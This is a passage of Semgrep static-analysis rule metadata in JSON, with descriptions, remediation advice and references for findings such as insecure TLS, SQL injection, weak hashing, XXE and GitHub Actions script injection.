versions are TLSv1.2 and TLS1.3; older versions are known to be broken and are susceptible to attacks. Prefer use of TLSv1.2 or later."},"help":{"markdown":"Detected use of an insecure SSL version. Secure SSL versions are TLSv1.2 and TLS1.3; older versions are known to be broken and are susceptible to attacks. Prefer use of TLSv1.2 or later.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.insecure-ssl-version.insecure-ssl-version)\n - [https://www.acunetix.com/blog/web-security-zone/hardening-nginx/](https://www.acunetix.com/blog/web-security-zone/hardening-nginx/)\n - [https://www.acunetix.com/blog/articles/tls-ssl-cipher-hardening/](https://www.acunetix.com/blog/articles/tls-ssl-cipher-hardening/)\n","text":"Detected use of an insecure SSL version. Secure SSL versions are TLSv1.2 and TLS1.3; older versions are known to be broken and are susceptible to attacks. Prefer use of TLSv1.2 or later."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.insecure-ssl-version.insecure-ssl-version","id":"generic.nginx.security.insecure-ssl-version.insecure-ssl-version","name":"generic.nginx.security.insecure-ssl-version.insecure-ssl-version","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.insecure-ssl-version.insecure-ssl-version"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://pg.uptrace.dev/queries/](https://pg.uptrace.dev/queries/)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"helpUri":"https://semgrep.dev/r/go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf","id":"go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf","name":"go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User-controlled data from request is passed to 'RawSQL()'. This could lead to a SQL injection and therefore protected information could be leaked. Instead, use parameterized queries or escape the user-controlled data by using `params` and not using quote placeholders in the SQL string."},"help":{"markdown":"User-controlled data from request is passed to 'RawSQL()'. This could lead to a SQL injection and therefore protected information could be leaked. Instead, use parameterized queries or escape the user-controlled data by using `params` and not using quote placeholders in the SQL string.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql)\n - [https://docs.djangoproject.com/en/3.0/ref/models/expressions/#django.db.models.expressions.RawSQL](https://docs.djangoproject.com/en/3.0/ref/models/expressions/#django.db.models.expressions.RawSQL)\n","text":"User-controlled data from request is passed to 'RawSQL()'. This could lead to a SQL injection and therefore protected information could be leaked. Instead, use parameterized queries or escape the user-controlled data by using `params` and not using quote placeholders in the SQL string."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql","id":"python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql","name":"python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"MD5 hash algorithm detected. This is not collision resistant and leads to easily-cracked password hashes. Replace with current recommended hashing algorithms."},"help":{"markdown":"MD5 hash algorithm detected. This is not collision resistant and leads to easily-cracked password hashes. Replace with current recommended hashing algorithms.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/clojure.lang.security.use-of-md5.use-of-md5)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html)\n","text":"MD5 hash algorithm detected. This is not collision resistant and leads to easily-cracked password hashes. Replace with current recommended hashing algorithms."},"helpUri":"https://semgrep.dev/r/clojure.lang.security.use-of-md5.use-of-md5","id":"clojure.lang.security.use-of-md5.use-of-md5","name":"clojure.lang.security.use-of-md5.use-of-md5","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: clojure.lang.security.use-of-md5.use-of-md5"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. The driver API has the ability to bind parameters to the query in a safe way. Make sure not to dynamically create SQL queries from user-influenced inputs. If you cannot avoid this, either escape the data properly or create an allowlist to check the value."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. The driver API has the ability to bind parameters to the query in a safe way. Make sure not to dynamically create SQL queries from user-influenced inputs. If you cannot avoid this, either escape the data properly or create an allowlist to check the value.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. The driver API has the ability to bind parameters to the query in a safe way. Make sure not to dynamically create SQL queries from user-influenced inputs. If you cannot avoid this, either escape the data properly or create an allowlist to check the value."},"helpUri":"https://semgrep.dev/r/python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi","id":"python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi","name":"python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password","id":"ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password","name":"ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a pgx Go SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead. You can use parameterized queries like so: (`SELECT $1 FROM table`, `data1)"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a pgx Go SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead. You can use parameterized queries like so: (`SELECT $1 FROM table`, `data1)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.sqli.pgx-sqli.pgx-sqli)\n - [https://github.com/jackc/pgx](https://github.com/jackc/pgx)\n - [https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool](https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool)\n","text":"Detected string concatenation with a non-literal variable in a pgx Go SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead. You can use parameterized queries like so: (`SELECT $1 FROM table`, `data1)"},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.sqli.pgx-sqli.pgx-sqli","id":"go.lang.security.audit.sqli.pgx-sqli.pgx-sqli","name":"go.lang.security.audit.sqli.pgx-sqli.pgx-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.sqli.pgx-sqli.pgx-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an AWS Elasticsearch domain using an insecure version of TLS. To fix this, set \"tls_security_policy\" equal to \"Policy-Min-TLS-1-2-2019-07\"."},"help":{"markdown":"Detected an AWS Elasticsearch domain using an insecure version of TLS. To fix this, set \"tls_security_policy\" equal to \"Policy-Min-TLS-1-2-2019-07\".\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected an AWS Elasticsearch domain using an insecure version of TLS. To fix this, set \"tls_security_policy\" equal to \"Policy-Min-TLS-1-2-2019-07\"."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version","id":"terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version","name":"terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of angular.element can lead to XSS if user-input is treated as part of the HTML element within `$SINK`. It is recommended to contextually output encode user-input, before inserting into `$SINK`. If the HTML needs to be preserved it is recommended to sanitize the input using $sce.getTrustedHTML or $sanitize."},"help":{"markdown":"Use of angular.element can lead to XSS if user-input is treated as part of the HTML element within `$SINK`. It is recommended to contextually output encode user-input, before inserting into `$SINK`. If the HTML needs to be preserved it is recommended to sanitize the input using $sce.getTrustedHTML or $sanitize.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint)\n - [https://docs.angularjs.org/api/ng/function/angular.element](https://docs.angularjs.org/api/ng/function/angular.element)\n - [https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf](https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf)\n","text":"Use of angular.element can lead to XSS if user-input is treated as part of the HTML element within `$SINK`. It is recommended to contextually output encode user-input, before inserting into `$SINK`. If the HTML needs to be preserved it is recommended to sanitize the input using $sce.getTrustedHTML or $sanitize."},"helpUri":"https://semgrep.dev/r/javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint","id":"javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint","name":"javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.pg.pg-empty-password.pg-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.pg.pg-empty-password.pg-empty-password","id":"go.secrets.pg.pg-empty-password.pg-empty-password","name":"go.secrets.pg.pg-empty-password.pg-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.pg.pg-empty-password.pg-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application's App Transport Security (ATS) configuration does not leverage the in-built public key pinning mechanisms. The application should consider leverage ATS public key pinning to ensure that the application only communicates to serves with an allow-listed certificate (and public key). By default the device will allow connections if the default trust store (CA store) posesses the right certificates. The number of accepted Certificate Authorities by default is hundreds. Using public key pinning vastly reduces the attack surface."},"help":{"markdown":"The application's App Transport Security (ATS) configuration does not leverage the in-built public key pinning mechanisms. The application should consider leverage ATS public key pinning to ensure that the application only communicates to serves with an allow-listed certificate (and public key). By default the device will allow connections if the default trust store (CA store) posesses the right certificates. The number of accepted Certificate Authorities by default is hundreds. Using public key pinning vastly reduces the attack surface.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication)\n","text":"The application's App Transport Security (ATS) configuration does not leverage the in-built public key pinning mechanisms. The application should consider leverage ATS public key pinning to ensure that the application only communicates to serves with an allow-listed certificate (and public key). By default the device will allow connections if the default trust store (CA store) posesses the right certificates. The number of accepted Certificate Authorities by default is hundreds. Using public key pinning vastly reduces the attack surface."},"helpUri":"https://semgrep.dev/r/swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning","id":"swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning","name":"swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning","properties":{"precision":"very-high","tags":["CWE-296: Improper Following of a Certificate's Chain of Trust","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"`$TY` is setup to use the ECB cipher mode. This mode is insecure because it does not use an initialization vector (IV) and can leak information about the plaintext. Use a more secure scheme like `AesGcm` or a mode like `CipherMode.CTS`."},"help":{"markdown":"`$TY` is setup to use the ECB cipher mode. This mode is insecure because it does not use an initialization vector (IV) and can leak information about the plaintext. Use a more secure scheme like `AesGcm` or a mode like `CipherMode.CTS`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode)\n - [https://cwe.mitre.org/data/definitions/327.html](https://cwe.mitre.org/data/definitions/327.html)\n - [https://learn.microsoft.com/en-us/dotnet/fundamentals/code-analysis/quality-rules/ca5358](https://learn.microsoft.com/en-us/dotnet/fundamentals/code-analysis/quality-rules/ca5358)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"`$TY` is setup to use the ECB cipher mode. This mode is insecure because it does not use an initialization vector (IV) and can leak information about the plaintext. Use a more secure scheme like `AesGcm` or a mode like `CipherMode.CTS`."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode","id":"csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode","name":"csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases."},"helpUri":"https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false","id":"python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false","name":"python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The function `openssl_decrypt` returns either a string of the decrypted data on success or `false` on failure. If the failure case is not handled, this could lead to undefined behavior in your application. Please handle the case where `openssl_decrypt` returns `false`."},"help":{"markdown":"The function `openssl_decrypt` returns either a string of the decrypted data on success or `false` on failure. If the failure case is not handled, this could lead to undefined behavior in your application. Please handle the case where `openssl_decrypt` returns `false`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate)\n - [https://www.php.net/manual/en/function.openssl-decrypt.php](https://www.php.net/manual/en/function.openssl-decrypt.php)\n","text":"The function `openssl_decrypt` returns either a string of the decrypted data on success or `false` on failure. If the failure case is not handled, this could lead to undefined behavior in your application. Please handle the case where `openssl_decrypt` returns `false`."},"helpUri":"https://semgrep.dev/r/php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate","id":"php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate","name":"php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate","properties":{"precision":"very-high","tags":["CWE-252: Unchecked Return Value","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a 'urllib.request.Request()' object using an insecure transport protocol, 'http://'. This connection will not be encrypted. Use 'https://' instead."},"help":{"markdown":"Detected a 'urllib.request.Request()' object using an insecure transport protocol, 'http://'. This connection will not be encrypted. Use 'https://' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object)\n - [https://docs.python.org/3/library/urllib.request.html#urllib.request.Request](https://docs.python.org/3/library/urllib.request.html#urllib.request.Request)\n","text":"Detected a 'urllib.request.Request()' object using an insecure transport protocol, 'http://'. This connection will not be encrypted. Use 'https://' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object","id":"python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object","name":"python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader)\n - [https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html](https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html)\n - [https://www.php.net/libxml_disable_entity_loader](https://www.php.net/libxml_disable_entity_loader)\n - [https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php](https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader","id":"php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader","name":"php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Using variable interpolation `${{...}}` with `github` context data in a `actions/github-script`'s `script:` step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. `github` context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with `env:` to store the data and use the environment variable in the `run:` script. Be sure to use double-quotes the environment variable, like this: \"$ENVVAR\"."},"help":{"markdown":"Using variable interpolation `${{...}}` with `github` context data in a `actions/github-script`'s `script:` step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. `github` context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with `env:` to store the data and use the environment variable in the `run:` script. Be sure to use double-quotes the environment variable, like this: \"$ENVVAR\".\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.github-actions.security.github-script-injection.github-script-injection)\n - [https://docs.github.com/en/actions/learn-github-actions/security-hardening-for-github-actions#understanding-the-risk-of-script-injections](https://docs.github.com/en/actions/learn-github-actions/security-hardening-for-github-actions#understanding-the-risk-of-script-injections)\n - [https://securitylab.github.com/research/github-actions-untrusted-input/](https://securitylab.github.com/research/github-actions-untrusted-input/)\n - [https://github.com/actions/github-script](https://github.com/actions/github-script)\n","text":"Using variable interpolation `${{...}}` with `github` context data in a `actions/github-script`'s `script:` step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. `github` context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with `env:` to store the data and use the environment variable in the `run:` script. Be sure to use double-quotes the environment variable, like this: \"$ENVVAR\"."},"helpUri":"https://semgrep.dev/r/yaml.github-actions.security.github-script-injection.github-script-injection","id":"yaml.github-actions.security.github-script-injection.github-script-injection","name":"yaml.github-actions.security.github-script-injection.github-script-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: 